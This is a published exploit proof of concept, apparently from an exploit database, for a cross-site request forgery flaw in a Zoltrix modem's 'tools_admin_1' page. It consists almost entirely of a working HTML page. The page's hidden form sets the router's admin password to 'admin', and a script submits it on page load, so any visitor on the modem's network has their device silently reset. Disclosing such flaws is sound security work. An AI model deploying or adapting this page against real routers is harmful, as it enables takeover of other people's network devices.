# Exploit Title: Zoltrix Modem - 'tools_admin_1' Cross site request forgery # Date: 2025-03-30 # Exploit Author: Amir Hossein Jamshidi # Vendor Homepage: https://www.zoltrix-int.com/lander # Version: 3.20.27.0_TC3087 # Tested on: Linux # CVE: N/A # Firmware Version: GAN4.GT205A-14-ZT-R9B011-IR.EN <!DOCTYPE html> <html> <head> <title>CSRF PoC</title> </head> <body> <!--- ################################################################################# # Zoltrix Modem - 'tools_admin_1' Cross site request forgery # # BY: Amir Hossein Jamshidi # # Mail: amirhosseinjamshidi64@gmail.com # # github: https://github.com/amirhosseinjamshidi64 # # Usage: open http://localhost:9999/exploit.html # ################################################################################# ---> <h1>CSRF Proof of Concept</h1> <p>This page demonstrates a potential CSRF vulnerability.</p> <form action="http://192.168.1.1/Forms/tools_admin_1" method="POST" id="csrf-form"> <input type="hidden" name="uiViewTools_Password" value="admin"> <input type="hidden" name="uiViewTools_PasswordConfirm" value="admin"> </form> <script> // Automatically submit the form when the page loads window.onload = function() { document.getElementById('csrf-form').submit(); }; </script> </body> </html>